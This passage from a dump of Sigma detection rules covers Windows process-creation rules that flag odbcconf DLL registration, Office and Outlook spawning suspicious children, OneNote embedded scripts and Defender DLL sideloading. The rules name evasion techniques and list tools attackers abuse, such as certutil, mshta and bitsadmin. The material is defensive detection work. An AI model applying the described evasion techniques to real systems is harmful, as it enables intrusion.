    "content": "title: Potentially Suspicious DLL Registered Via Odbcconf.EXE\nid: ba4cfc11-d0fa-4d94-bf20-7c332c412e76\nrelated:\n    - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70\n      type: derived\nstatus: test\ndescription: Detects execution of \"odbcconf\" with the \"REGSVR\" action where the DLL in question doesn't contain a \".dll\" extension, which is often used as a method to evade defenses.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        # Note: The \"/A\" flag is not required to call a specific action\n        CommandLine|contains: 'REGSVR '\n    filter_main_dll_ext:\n        CommandLine|contains: '.dll'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml",
    "content": "title: Response File Execution Via Odbcconf.EXE\nid: 5f03babb-12db-4eec-8c82-7b4cb5580868\nrelated:\n    - id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5\n      type: similar\n    - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e\n      type: obsolete\nstatus: test\ndescription: Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file which might contain a malicious action.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\nauthor: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -f '\n    selection_rsp_ext:\n        CommandLine|contains: '.rsp'\n    condition: all of selection_*\nfalsepositives:\n    - The rule is looking for any usage of a response file, which might generate false positives when this function is used legitimately. Investigate the contents of the \".rsp\" file to determine if it is malicious and apply additional filters if necessary.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml",
    "content": "title: Suspicious Response File Execution Via Odbcconf.EXE\nid: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5\nrelated:\n    - id: 5f03babb-12db-4eec-8c82-7b4cb5580868\n      type: derived\n    - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e\n      type: obsolete\nstatus: test\ndescription: Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file with a non-\".rsp\" extension.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -f '\n    filter_main_rsp_ext:\n        CommandLine|contains: '.rsp'\n    filter_main_runonce_odbc:\n        # When odbcconf is run with the \"/R\" flag, it creates a \"runonce\" key to run at the next reboot\n        ParentImage: 'C:\\Windows\\System32\\runonce.exe'\n        Image: 'C:\\Windows\\System32\\odbcconf.exe'\n        CommandLine|contains: '.exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Spawned By Odbcconf.EXE\nid: 8e3c7994-131e-4ba5-b6ea-804d49113a26\nstatus: test\ndescription: Detects an uncommon child process of the \"odbcconf.exe\" binary, which normally shouldn't have any child processes.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac\nauthor: Harjot Singh @cyb3rjy0t\ndate: 2023-05-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\odbcconf.exe'\n    condition: selection\nfalsepositives:\n    - In rare occurrences where \"odbcconf\" crashes, it might spawn a \"werfault\" process\n    - Other child processes will depend on the DLL being registered by actions like \"regsvr\". In cases where the DLLs have external calls (which should be rare), other child processes might spawn and additional filters need to be applied.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml",
    "content": "title: Potential Arbitrary File Download Using Office Application\nid: 4ae3e30b-b03f-43aa-87e3-b622f4048eed\nrelated:\n    - id: 0c79148b-118e-472b-bdb7-9b57b444cc19\n      type: obsolete\nstatus: test\ndescription: Detects potential arbitrary file download using a Microsoft Office application\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/\n    - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191\nauthor: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community\ndate: 2022-05-17\nmodified: 2023-06-22\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\EXCEL.EXE'\n              - '\\POWERPNT.EXE'\n              - '\\WINWORD.exe'\n        - OriginalFileName:\n              - 'Excel.exe'\n              - 'POWERPNT.EXE'\n              - 'WinWord.exe'\n    selection_http:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml",
    "content": "title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp\nid: 551d9c1f-816c-445b-a7a6-7a3864720d60\nstatus: test\ndescription: |\n    Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the \"ActivateMicrosoftApp\" Excel DCOM object.\nreferences:\n    - https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922\n    - https://github.com/grayhatkiller/SharpExShell\n    - https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication\nauthor: Aaron Stratton\ndate: 2023-11-13\ntags:\n    - attack.t1021.003\n    - attack.lateral-movement\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\excel.exe'\n    selection_child:\n        - OriginalFileName:\n          - 'foxprow.exe'\n          - 'schdplus.exe'\n          - 'winproj.exe'\n        - Image|endswith:\n          - '\\foxprow.exe'\n          - '\\schdplus.exe'\n          - '\\winproj.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml",
    "content": "title: Potentially Suspicious Office Document Executed From Trusted Location\nid: f99abdf0-6283-4e71-bd2b-b5c048a94743\nstatus: test\ndescription: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often use this to avoid macro security and execute their malicious code.\nreferences:\n    - Internal Research\n    - https://twitter.com/Max_Mal_/status/1633863678909874176\n    - https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465\n    - https://twitter.com/_JohnHammond/status/1588155401752788994\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-21\nmodified: 2023-10-18\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        # Note: we add a parent shell to reduce FP. Add additional 3rd party shells that you might use\n        ParentImage|endswith:\n            - '\\explorer.exe'\n            - '\\dopus.exe'\n    selection_img:\n        - Image|endswith:\n              - '\\EXCEL.EXE'\n              - '\\POWERPNT.EXE'\n              - '\\WINWORD.exe'\n        - OriginalFileName:\n              - 'Excel.exe'\n              - 'POWERPNT.EXE'\n              - 'WinWord.exe'\n    selection_trusted_location:\n        CommandLine|contains:\n            # Note: these are the default locations. Admins/Users could add additional ones that you need to cover\n            - '\\AppData\\Roaming\\Microsoft\\Templates'\n            - '\\AppData\\Roaming\\Microsoft\\Word\\Startup\\'\n            - '\\Microsoft Office\\root\\Templates\\'\n            - '\\Microsoft Office\\Templates\\'\n    filter_main_dotx:\n        # Note: We add this filter to avoid curious people clicking on template files\n        CommandLine|endswith:\n            - '.dotx'\n            - '.xltx'\n            - '.potx'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_onenote_embedded_script_execution.yml",
    "content": "title: OneNote.EXE Execution of Malicious Embedded Scripts\nid: 84b1706c-932a-44c4-ae28-892b28a25b94\nstatus: test\ndescription: |\n    Detects the execution of malicious OneNote documents that contain embedded scripts.\n    When a user clicks on a OneNote attachment and then on the malicious link inside the \".one\" file, it exports and executes the malicious embedded script from specific directories.\nreferences:\n    - https://bazaar.abuse.ch/browse/tag/one/\nauthor: '@kostastsale'\ndate: 2023-02-02\ntags:\n    - attack.defense-evasion\n    - attack.t1218.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\onenote.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        CommandLine|contains:\n            - '\\exported\\'\n            - '\\onenoteofflinecache_files\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml",
    "content": "title: Suspicious Microsoft OneNote Child Process\nid: c27515df-97a9-4162-8a60-dc0eeb51b775\nrelated:\n    - id: 438025f9-5856-4663-83f7-52f878a70a50 # Generic rule for suspicious office application child processes\n      type: derived\nstatus: test\ndescription: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18\n    - https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0\nauthor: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)\ndate: 2022-10-21\nmodified: 2023-02-10\ntags:\n    - attack.t1566\n    - attack.t1566.001\n    - attack.initial-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\onenote.exe'\n    selection_opt_img:\n        - OriginalFileName:\n              - 'bitsadmin.exe'\n              - 'CertOC.exe'\n              - 'CertUtil.exe'\n              - 'Cmd.Exe'\n              - 'CMSTP.EXE'\n              - 'cscript.exe'\n              - 'curl.exe'\n              - 'HH.exe'\n              - 'IEExec.exe'\n              - 'InstallUtil.exe'\n              - 'javaw.exe'\n              - 'Microsoft.Workflow.Compiler.exe'\n              - 'msdt.exe'\n              - 'MSHTA.EXE'\n              - 'msiexec.exe'\n              - 'Msxsl.exe'\n              - 'odbcconf.exe'\n              - 'pcalua.exe'\n              - 'PowerShell.EXE'\n              - 'RegAsm.exe'\n              - 'RegSvcs.exe'\n              - 'REGSVR32.exe'\n              - 'RUNDLL32.exe'\n              - 'schtasks.exe'\n              - 'ScriptRunner.exe'\n              - 'wmic.exe'\n              - 'WorkFolders.exe'\n              - 'wscript.exe'\n        - Image|endswith:\n              - '\\AppVLP.exe'\n              - '\\bash.exe'\n              - '\\bitsadmin.exe'\n              - '\\certoc.exe'\n              - '\\certutil.exe'\n              - '\\cmd.exe'\n              - '\\cmstp.exe'\n              - '\\control.exe'\n              - '\\cscript.exe'\n              - '\\curl.exe'\n              - '\\forfiles.exe'\n              - '\\hh.exe'\n              - '\\ieexec.exe'\n              - '\\installutil.exe'\n              - '\\javaw.exe'\n              - '\\mftrace.exe'\n              - '\\Microsoft.Workflow.Compiler.exe'\n              - '\\msbuild.exe'\n              - '\\msdt.exe'\n              - '\\mshta.exe'\n              - '\\msidb.exe'\n              - '\\msiexec.exe'\n              - '\\msxsl.exe'\n              - '\\odbcconf.exe'\n              - '\\pcalua.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regasm.exe'\n              - '\\regsvcs.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\schtasks.exe'\n              - '\\scrcons.exe'\n              - '\\scriptrunner.exe'\n              - '\\sh.exe'\n              - '\\svchost.exe'\n              - '\\verclsid.exe'\n              - '\\wmic.exe'\n              - '\\workfolders.exe'\n              - '\\wscript.exe'\n    selection_opt_explorer:\n        Image|endswith: '\\explorer.exe'\n        CommandLine|contains:\n            - '.hta'\n            - '.vb'\n            - '.wsh'\n            - '.js'\n            - '.ps'\n            - '.scr'\n            - '.pif'\n            - '.bat'\n            - '.cmd'\n    selection_opt_paths:\n        Image|contains:\n            - '\\AppData\\'\n            - '\\Users\\Public\\'\n            - '\\ProgramData\\'\n            - '\\Windows\\Tasks\\'\n            - '\\Windows\\Temp\\'\n            - '\\Windows\\System32\\Tasks\\'\n    filter_teams:\n        Image|endswith: '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n        CommandLine|endswith: '-Embedding'\n    filter_onedrive:\n        Image|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n        Image|endswith: '\\FileCoAuth.exe'\n        CommandLine|endswith: '-Embedding'\n    condition: selection_parent and 1 of selection_opt_* and not 1 of filter_*\nfalsepositives:\n    - File located in the AppData folder with trusted signature\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml",
    "content": "title: Outlook EnableUnsafeClientMailRules Setting Enabled\nid: 55f0a3a1-846e-40eb-8273-677371b8d912\nrelated:\n    - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 # Registry variation\n      type: similar\nstatus: test\ndescription: Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44\n    - https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048\nauthor: Markus Neis, Nasreddine Bencherchali (Nextron Systems)\ndate: 2018-12-27\nmodified: 2023-02-09\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '\\Outlook\\Security\\EnableUnsafeClientMailRules'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml",
    "content": "title: Suspicious Execution From Outlook Temporary Folder\nid: a018fdc3-46a3-44e5-9afb-2cd4af1d4b39\nstatus: test\ndescription: Detects a suspicious program execution in Outlook temp folder\nauthor: Florian Roth (Nextron Systems)\nreferences:\n    - Internal Research\ndate: 2019-10-01\nmodified: 2022-10-09\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains: '\\Temporary Internet Files\\Content.Outlook\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml",
    "content": "title: Suspicious Outlook Child Process\nid: 208748f7-881d-47ac-a29c-07ea84bf691d\nrelated:\n    - id: 438025f9-5856-4663-83f7-52f878a70a50 # Office Child Processes\n      type: derived\n    - id: e212d415-0e93-435f-9e1a-f29005bb4723 # Outlook Remote Child Process\n      type: derived\nstatus: test\ndescription: Detects a suspicious process spawning from an Outlook process.\nreferences:\n    - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100\n    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html\nauthor: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team\ndate: 2022-02-28\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\OUTLOOK.EXE'\n        Image|endswith:\n            - '\\AppVLP.exe'\n            - '\\bash.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\forfiles.exe'\n            - '\\hh.exe'\n            - '\\mftrace.exe'\n            - '\\msbuild.exe'        # https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n            - '\\msdt.exe'           # CVE-2022-30190\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\schtasks.exe'\n            - '\\scrcons.exe'\n            - '\\scriptrunner.exe'\n            - '\\sh.exe'\n            - '\\svchost.exe'        # https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html\n            - '\\wmic.exe'           # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\n            - '\\wscript.exe'\n            # Several FPs with rundll32.exe\n            # We started excluding specific use cases and ended up commenting out the rundll32.exe sub processes completely\n            # - '\\rundll32.exe'\n            # filter_outlook_photoviewer:  # https://twitter.com/Luke_Hamp/status/1495919717760237568\n            #   ParentImage|endswith: '\\OUTLOOK.EXE'\n            #   Image|endswith: '\\rundll32.exe'\n            #   CommandLine|contains: '\\PhotoViewer.dll'\n            # filter_outlook_printattachments:  # https://twitter.com/KickaKamil/status/1496238278659485696\n            #   ParentImage|endswith: '\\OUTLOOK.EXE'\n            #   Image|endswith: '\\rundll32.exe'\n            #   CommandLine|contains|all:\n            #     - 'shell32.dll,Control_RunDLL'\n            #     - '\\SYSTEM32\\SPOOL\\DRIVERS\\'\n    condition: selection # and not 1 of filter*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml",
    "content": "title: Suspicious Remote Child Process From Outlook\nid: e212d415-0e93-435f-9e1a-f29005bb4723\nrelated:\n    - id: 208748f7-881d-47ac-a29c-07ea84bf691d # Outlook Child Processes\n      type: similar\nstatus: test\ndescription: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).\nreferences:\n    - https://github.com/sensepost/ruler\n    - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49\nauthor: Markus Neis, Nasreddine Bencherchali (Nextron Systems)\ndate: 2018-12-27\nmodified: 2023-02-09\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\outlook.exe'\n        Image|startswith: '\\\\\\\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml",
    "content": "title: Suspicious Binary In User Directory Spawned From Office Application\nid: aa3a6f94-890e-4e22-b634-ffdfd54792cc\nstatus: test\ndescription: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)\nreferences:\n    - https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign\n    - https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57\nauthor: Jason Lynch\ndate: 2019-04-02\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - attack.g0046\n    - car.2013-05-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\WINWORD.EXE'\n            - '\\EXCEL.EXE'\n            - '\\POWERPNT.exe'\n            - '\\MSPUB.exe'\n            - '\\VISIO.exe'\n            - '\\MSACCESS.exe'\n            - '\\EQNEDT32.exe'\n            # - '\\OUTLOOK.EXE' too many FPs\n        Image|startswith: 'C:\\users\\'\n        Image|endswith: '.exe'\n    filter:\n        Image|endswith: '\\Teams.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml",
    "content": "title: Suspicious Microsoft Office Child Process\nid: 438025f9-5856-4663-83f7-52f878a70a50\nrelated:\n    - id: c27515df-97a9-4162-8a60-dc0eeb51b775 # Specific OneNote rule due to its recent usage in phishing attacks\n      type: derived\n    - id: e1693bc8-7168-4eab-8718-cdcaa68a1738\n      type: derived\n    - id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8\n      type: obsolete\n    - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a\n      type: obsolete\n    - id: 04f5363a-6bca-42ff-be70-0d28bf629ead\n      type: obsolete\nstatus: test\ndescription: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)\nreferences:\n    - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100\n    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\n    - https://github.com/splunk/security_content/blob/300af51b88ad5d5b27ce4f5f54e4d6e6a3a2c06d/detections/endpoint/office_spawning_control.yml\n    - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A\n    - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set\n    - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n    - https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html\n    - https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\nauthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io\ndate: 2018-04-06\nmodified: 2023-04-24\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1047\n    - attack.t1204.002\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\EQNEDT32.EXE'\n            - '\\EXCEL.EXE'\n            - '\\MSACCESS.EXE'\n            - '\\MSPUB.exe'\n            - '\\ONENOTE.EXE'\n            - '\\POWERPNT.exe'\n            - '\\VISIO.exe'\n            - '\\WINWORD.EXE'\n            - '\\wordpad.exe'\n            - '\\wordview.exe'\n    selection_child_processes:\n        - OriginalFileName:\n              - 'bitsadmin.exe'\n              - 'CertOC.exe'\n              - 'CertUtil.exe'\n              - 'Cmd.Exe'\n              - 'CMSTP.EXE'\n              - 'cscript.exe'\n              - 'curl.exe'\n              - 'HH.exe'\n              - 'IEExec.exe'\n              - 'InstallUtil.exe'\n              - 'javaw.exe'\n              - 'Microsoft.Workflow.Compiler.exe'\n              - 'msdt.exe'\n              - 'MSHTA.EXE'\n              - 'msiexec.exe'\n              - 'Msxsl.exe'\n              - 'odbcconf.exe'\n              - 'pcalua.exe'\n              - 'PowerShell.EXE'\n              - 'RegAsm.exe'\n              - 'RegSvcs.exe'\n              - 'REGSVR32.exe'\n              - 'RUNDLL32.exe'\n              - 'schtasks.exe'\n              - 'ScriptRunner.exe'\n              - 'wmic.exe'\n              - 'WorkFolders.exe'\n              - 'wscript.exe'\n        - Image|endswith:\n              - '\\AppVLP.exe'\n              - '\\bash.exe'\n              - '\\bitsadmin.exe'\n              - '\\certoc.exe'\n              - '\\certutil.exe'\n              - '\\cmd.exe'\n              - '\\cmstp.exe'\n              - '\\control.exe'\n              - '\\cscript.exe'\n              - '\\curl.exe'\n              - '\\forfiles.exe'\n              - '\\hh.exe'\n              - '\\ieexec.exe'\n              - '\\installutil.exe'\n              - '\\javaw.exe'\n              - '\\mftrace.exe'\n              - '\\Microsoft.Workflow.Compiler.exe'\n              - '\\msbuild.exe'\n              - '\\msdt.exe'\n              - '\\mshta.exe'\n              - '\\msidb.exe'\n              - '\\msiexec.exe'\n              - '\\msxsl.exe'\n              - '\\odbcconf.exe'\n              - '\\pcalua.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regasm.exe'\n              - '\\regsvcs.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\schtasks.exe'\n              - '\\scrcons.exe'\n              - '\\scriptrunner.exe'\n              - '\\sh.exe'\n              - '\\svchost.exe'\n              - '\\verclsid.exe'\n              - '\\wmic.exe'\n              - '\\workfolders.exe'\n              - '\\wscript.exe'\n    selection_child_susp_paths: # Idea: Laiali Kazalbach, Mohamed Elsayed (#4142)\n        Image|contains:\n            - '\\AppData\\'\n            - '\\Users\\Public\\'\n            - '\\ProgramData\\'\n            - '\\Windows\\Tasks\\'\n            - '\\Windows\\Temp\\'\n            - '\\Windows\\System32\\Tasks\\'\n    condition: selection_parent and 1 of selection_child_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_winword_dll_load.yml",
    "content": "title: Potential Arbitrary DLL Load Using Winword\nid: f7375e28-5c14-432f-b8d1-1db26c832df3\nrelated:\n    - id: 2621b3a6-3840-4810-ac14-a02426086171\n      type: obsolete\nstatus: test\ndescription: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.\nreferences:\n    - https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2023-03-29\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WINWORD.exe'\n        - OriginalFileName: 'WinWord.exe'\n    selection_dll:\n        CommandLine|contains|all:\n            - '/l '\n            - '.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml",
    "content": "title: Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution\nid: 02b18447-ea83-4b1b-8805-714a8a34546a\nstatus: test\ndescription: |\n    Detects execution of Windows Defender \"OfflineScannerShell.exe\" from its non standard directory.\n    The \"OfflineScannerShell.exe\" binary is vulnerable to DLL side loading and will load any DLL named \"mpclient.dll\" from the current working directory.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/\nauthor: frack113\ndate: 2022-03-06\nmodified: 2023-08-03\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\OfflineScannerShell.exe'\n        - OriginalFileName: 'OfflineScannerShell.exe'\n    filter_main_legit_dir:\n        CurrentDirectory: 'C:\\Program Files\\Windows Defender\\Offline\\'\n    filter_main_empty:\n        CurrentDirectory: ''\n    filter_main_null:\n        CurrentDirectory: null\n    condition: selection and not 1 of 